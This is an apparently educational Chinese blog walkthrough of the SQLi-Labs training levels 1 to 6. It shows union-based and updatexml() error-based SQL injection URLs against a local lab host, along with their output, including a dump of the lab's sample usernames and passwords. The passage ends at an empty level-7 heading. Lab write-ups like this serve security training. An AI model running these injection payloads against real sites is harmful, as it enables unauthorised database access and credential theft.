SQL注入系列:SQLi Labs

时间:2022-02-05 21:56:19

前言

关于注释

说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格

MYSQL有三种常用注释:

--[空格]注释内容
#注释内容(url中使用23%)
/*注释内容*/

第一关

SQL注入系列:SQLi Labs

测试注入类型:

http://192.168.142.136/sqli/Less-1/?id=1'

报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

http://192.168.142.136/sqli/Less-1/?id=1 and 1=1

返回正常

http://192.168.142.136/sqli/Less-1/?id=1' and 1=1--+

返回正常

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2--+

返回异常,综上,字符型注入

http://192.168.142.136/sqli/Less-1/?id=1' order by 3--+

查询到有3个字段

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select1,2,3--+

爆出显示位2,3

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,concat(user(),database(),version()),3--+

SQL注入系列:SQLi Labs

http://192.168.142.136/sqli/Less-1/?id=1'and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

SQL注入系列:SQLi Labs

http://192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

得到数据库security的所有表名:emails,referers,uagents,users

192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

得到列名:id,username,password

192.168.142.136/sqli/Less-1/?id=1' and 1=2 union select 1,(select group_concat(username,password) from security.users),3 --+

得到:

DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,adm

第二关

数字型注入

1、http://192.168.142.136/sqli/Less-2/?id=2 order by 3
2、http://192.168.142.136/sqli/Less-2/?id=2 and 1=2 union select 1,2,3
···
和上面一题基本一样,没啥说的了

第三关

http://192.168.142.136/sqli/Less-3/?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
可以看到是有括号的,那么构造就是

1、http://192.168.142.136/sqli/Less-3/?id=1') order by 3%23
2、http://192.168.142.136/sqli/Less-3/?id=22') union select 1,2,3%23
3、http://192.168.142.136/sqli/Less-3/?id=22') union select 1,concat(database(),version(),user()),3%23
···
后面也没啥说的了,就和第一关一样操作下来

第四关

加单引号不报错,双引号报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"2"") LIMIT 0,1' at line 1

可以得到闭合方式为:("")

http://192.168.142.136/sqli/Less-4/?id=2") order by 3%23

和第三关差不多,不再赘述

第五关

SQL注入系列:SQLi Labs

这一关有些不同,没有显示位,没法使用联合注入去查询数据

加单引号报错信息为:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

那么通过报错注入

SQL注入系列:SQLi Labs

利用函数updatexml()函数

获取:user(),database(),version()

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
得到:XPATH syntax error: '~root@localhost~'
同样的获取:database(),version()

现在来获取数据库库名:

' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)%23
得到:XPATH syntax error: '~information_schema~'

爆数据库表名:(可通过改变limit的参数一个个输出,或者使用:group_concat函数)

' and updatexml(1,concat(0x7e, (select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),1)%23
得到:XPATH syntax error: '~emails'

爆字段名:

' and updatexml(1,concat(0x7e, (select concat(column_name) from information_schema.columns where table_name='users' limit 0,1)),1)%23
得到:XPATH syntax error: '~id'

爆数据:

' and updatexml(1,concat(0x7e, (select concat_ws(':', username, password) from users limit 0,1)),1)%23

第六关

和第五关一样,不过是改了下闭合方式,加单引号不报错,加双引号报错

第七关